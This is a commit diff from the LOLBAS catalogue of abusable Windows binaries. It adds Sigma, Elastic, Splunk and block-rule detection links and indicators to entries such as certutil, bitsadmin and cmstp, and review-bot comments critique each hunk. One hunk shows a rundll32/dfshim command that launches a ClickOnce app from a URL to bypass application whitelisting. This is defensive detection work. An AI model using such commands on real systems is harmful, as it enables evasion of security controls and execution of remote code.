mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-15 00:01:18 +01:00
Detection Resources and Other Updates (#179)
* Add detection links for scripts
* Add detection links for OtherMSBins. Fixed and updated as needed.
* Add detection links for MSBins. Fixed and updated as needed.
* Add detection links for oslibraries
* Updating template for Detections
* Removing empty Detection:Sigma entries
* Remove redundant blank line
* Replacing commit URL with file URL

Co-authored-by: root <root@DESKTOP-5CR935D.localdomain>
Co-authored-by: Wietze <wietze@users.noreply.github.com>
parent
2031916b1a
commit
23dd0236ae
@ -26,6 +26,11 @@ Code_Sample:
|
|||||||
Detection:
|
Detection:
|
||||||
- IOC: Event ID 10
|
- IOC: Event ID 10
|
||||||
- IOC: binary.exe spawned
|
- IOC: binary.exe spawned
|
||||||
|
- Analysis: https://link/to/blog/gist/writeup/if/applicable
|
||||||
|
- Sigma: https://link/to/sigma/rule/if/applicable
|
||||||
|
- Elastic: https://link/to/elastic/rule/if/applicable
|
||||||
|
- Splunk: https://link/to/splunk/rule/if/applicable
|
||||||
|
- BlockRule: https://link/to/microsoft/block/rules/if/applicable
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://blogpost.com
|
- Link: http://blogpost.com
|
||||||
- Link: http://twitter.com/something
|
- Link: http://twitter.com/something
|
||||||
|
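Review bot: the new `Analysis`, `Sigma`, `Elastic`, `Splunk` and `BlockRule` keys added under `Detection:` in this template carry `https://link/to/...` placeholders, but nothing says they are optional, and this same commit had to strip empty `Detection:Sigma` entries from real files, so contributors copying the template will ship either a placeholder or an empty key. Add a comment that each of these keys is optional and must be deleted when unused, and have the YAML validation reject any value that still contains `link/to`. The unchanged `Resources` placeholders (`http://blogpost.com`, `http://twitter.com/something`) point at real-looking hosts; the reserved `example.com` domain would be the safer placeholder.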
@ -13,6 +13,7 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||||
|
Detection:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/notwhickey/status/1333900137232523264
|
- Link: https://twitter.com/notwhickey/status/1333900137232523264
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
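Review bot: the `Detection:` key added at the bottom of this hunk has no children, so it serializes as a null value rather than the list of `- IOC:`/`- Sigma:` entries every other file uses; either add at least one IOC for AppInstaller.exe or leave the key out until there is one, since a null `Detection` is exactly the kind of empty entry the commit message says was being removed. Also visible here: `Full_Path` pins a single package build (`Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe`), which will not match on a machine with any other App Installer version.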
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Sysmon Event ID 1 - Process Creation
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||||
|
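Review bot: this hunk is a one-for-one replacement, so `- IOC: Sysmon Event ID 1 - Process Creation` disappears and aspnet_compiler.exe is left with a `BlockRule` link only; keep the IOC and add the `BlockRule` line after it. The link is to the whole Microsoft recommended block-rules page, so the entry should also say that aspnet_compiler.exe is on that list, otherwise a reader cannot tell from the entry whether a block rule for this binary actually exists.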
@ -15,8 +15,9 @@ Full_Path:
|
|||||||
- Path: C:\WINDOWS\System32\At.exe
|
- Path: C:\WINDOWS\System32\At.exe
|
||||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scheduled task is created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml
|
||||||
- IOC: Windows event log - type 3 login
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml
|
||||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||||
- IOC: C:\Windows\Tasks\At1.job
|
- IOC: C:\Windows\Tasks\At1.job
|
||||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||||
|
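Review bot: two human-readable IOCs are lost in this hunk (`- IOC: Scheduled task is created` and `- IOC: Windows event log - type 3 login`) because the Sigma links replace them in place instead of being added alongside. The network-logon IOC in particular is what explains why a Zeek SMB rule (`zeek_smb_converted_win_atsvc_task.yml`) belongs in an At.exe entry: remote AT jobs arrive over the ATSVC named pipe as a type 3 logon. Restore both IOC lines and append the three `Sigma` lines after them, as the ATBroker hunk below does.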
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
||||||
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
||||||
|
@ -38,6 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
|
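Review bot: the `BlockRule` URL added under `Detection:` is the same `microsoft-recommended-block-rules` link that already sits under `Resources:` two lines below, so bash.exe now lists it twice. With `BlockRule` in the template, drop the `Resources` copy, or keep a `Resources` link only where it adds context beyond the block rule itself.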
@ -38,6 +38,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
- IOC: bitsadmin creates new files
|
- IOC: bitsadmin creates new files
|
||||||
- IOC: bitsadmin adds data to alternate data stream
|
- IOC: bitsadmin adds data to alternate data stream
|
||||||
|
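Review bot: `proxy_ua_bitsadmin_susp_tld.yml` is a proxy-log rule keyed on the BITS user agent, but the IOC list under it covers only endpoint artifacts (child processes, file creation, ADS writes); add a network-side IOC naming the user agent the rule matches so the entry's IOCs and rule links line up, the way the certutil and cmdl32 entries pair a `Useragent` IOC with their network rules. Minor: the three Sigma links are pinned to three different commits of the same repository; pinning is right, but one commit per repository per entry is easier to bump later.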
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml
|
||||||
- IOC: Process creation with given parameter
|
- IOC: Process creation with given parameter
|
||||||
- IOC: Unsigned DLL load via certoc.exe
|
- IOC: Unsigned DLL load via certoc.exe
|
||||||
- IOC: Network connection via certoc.exe
|
- IOC: Network connection via certoc.exe
|
||||||
|
@ -52,6 +52,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_certutil_encode.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e9260679d4aeae7f696001c5b14d318d31c8f076/rules/windows/process_creation/process_creation_root_certificate_installed.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||||
- IOC: Useragent CertUtil URL Agent
|
- IOC: Useragent CertUtil URL Agent
|
||||||
|
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
- IOC: cmd.exe executing files from alternate data streams.
|
- IOC: cmd.exe executing files from alternate data streams.
|
||||||
|
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usage of this command could be an IOC
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||||
|
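Review bot: dropping `- IOC: Usage of this command could be an IOC` is an improvement, since that line said nothing, but replacing it in place leaves cmdkey.exe with a rule link and no IOC at all. Add one that states concretely what `win_cmdkey_recon.yml` looks for (the command line the rule matches on), so a reader without Sigma tooling still has something to hunt for.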
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\System32\cmdl32.exe
|
- Path: C:\Windows\System32\cmdl32.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/3416db73016f25ce115f5597fe74320d2428db66/rules/windows/process_creation/win_pc_susp_cmdl32_lolbas.yml
|
||||||
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
||||||
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -24,8 +24,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||||
- IOC: Cmstp.exe communication towards internet and getting files
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
|
||||||
|
- IOC: DotNet CLR libraries loaded into cmstp.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - cmstp.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
||||||
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||||
|
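Review bot: `- IOC: Cmstp.exe communication towards internet and getting files` is removed in this hunk and never re-added, while the first IOC is re-added lower down in reworded form; the Elastic `unusual_process_network_connection` link covers the network case only indirectly, so restore the network IOC next to the new `DotNet CLR` ones. Two of the added rules (`win_uac_cmstp.yml`, `cmlua_or_cmstplua_uac_bypass.yml`) are about the CMSTPLUA UAC bypass, which none of the IOCs mention; an IOC describing auto-elevated cmstp.exe launching a child process would tie them in.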
@ -17,7 +17,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Control.exe executing files from alternate data streams.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- IOC: Control.exe executing files from alternate data streams
|
||||||
|
- IOC: Control.exe executing library file without cpl extension
|
||||||
|
- IOC: Suspicious network connections from control.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||||
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||||
|
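Review bot: `win_susp_control_cve_2021_40444.yml` is a rule written for one exploitation chain (CVE-2021-40444) rather than for control.exe abuse in general, so it should be labelled as such or listed after the generic `win_susp_control_dll_load.yml`; otherwise readers will assume it covers the ADS and non-.cpl cases the IOCs describe. The ADS IOC at the top of the hunk is removed and re-added lower down without its trailing period, which is fine, but it makes the diff show a remove/add pair for a line that did not change.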
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
|
||||||
|
- IOC: Csc.exe should normally not run as System account unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
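Review bot: the reworded IOC changes meaning. The original `Csc.exe should normally not run a system unless it is used for development` reads as a typo for "run on a system"; the new `should normally not run as System account` narrows it to the SYSTEM account, so csc.exe compiling on the fly under an ordinary user on a non-developer box would no longer be flagged, which is exactly the case the two `win_susp_csc*.yml` rules target. Suggest `Csc.exe should normally not run on a system unless it is used for development.` Also, `defense_evasion_execution_msbuild_started_unusal_process.toml` is an MSBuild rule; if it is listed because MSBuild spawns csc.exe, say so in the IOC text, otherwise it looks misfiled.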
@ -17,7 +17,16 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Cscript.exe executing files from alternate data streams
|
- IOC: Cscript.exe executing files from alternate data streams
|
||||||
|
- IOC: DotNet CLR libraries loaded into cscript.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - cscript.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
|
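Review bot: the `BlockRule` link added here points at the generic Microsoft recommended block-rules page, and nothing in the hunk shows that cscript.exe is on that list; either cite the list entry in the IOC text or leave `BlockRule` out, since a reader will otherwise assume a vendor block rule exists for the Windows Script Host. The seven rule links are a good addition; ordering them so `defense_evasion_unusual_dir_ads.toml` sits next to the ADS IOC it supports would make the pairing obvious.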
@ -16,6 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
|
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml
|
||||||
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
|
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
|
||||||
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
|
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
|
||||||
|
@ -16,6 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
|
||||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
|
|||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url
|
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||||
Usecase: Use binary to bypass Application whitelisting
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
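Review bot: the new parenthetical `(trampoline for Dfsvc.exe, DotNet ClickOnce host)` is useful but reads as a fragment; spell it out, e.g. `Executes a ClickOnce application from a URL: rundll32.exe loads dfshim.dll, which hands off to dfsvc.exe, the .NET ClickOnce host.` Also `click-once-application` should be `ClickOnce application`, matching the product name used in the stackoverflow link under Resources.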
@ -19,7 +19,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
|
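Review bot: the empty `- IOC:` is replaced by `win_susp_rundll32_activity.yml`, a generic suspicious-rundll32 rule; nothing in the hunk shows it matches `dfshim.dll,ShOpenVerbApplication`, and the entry is again left without an IOC. The command line in this file is itself the indicator, so add something like `- IOC: rundll32.exe loading dfshim.dll and launching dfsvc.exe with a URL argument` alongside the rule link.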
@ -24,8 +24,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
- IOC: Child process from diskshadow.exe
|
- IOC: Child process from diskshadow.exe
|
||||||
- IOC: Diskshadow reading input from file
|
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
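Review bot: `- IOC: Diskshadow reading input from file` is deleted (it becomes a blank line) and nothing replaces it, yet the bohops write-up under Resources is precisely about driving diskshadow from a script file; keep that IOC. `credential_access_cmdline_dump_tool.toml` is a broad credential-dumping rule rather than a diskshadow rule, so it belongs here only if its query actually names diskshadow; if it does not, drop it.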
@ -17,7 +17,14 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_dllhost_net_connections.yml
|
||||||
|
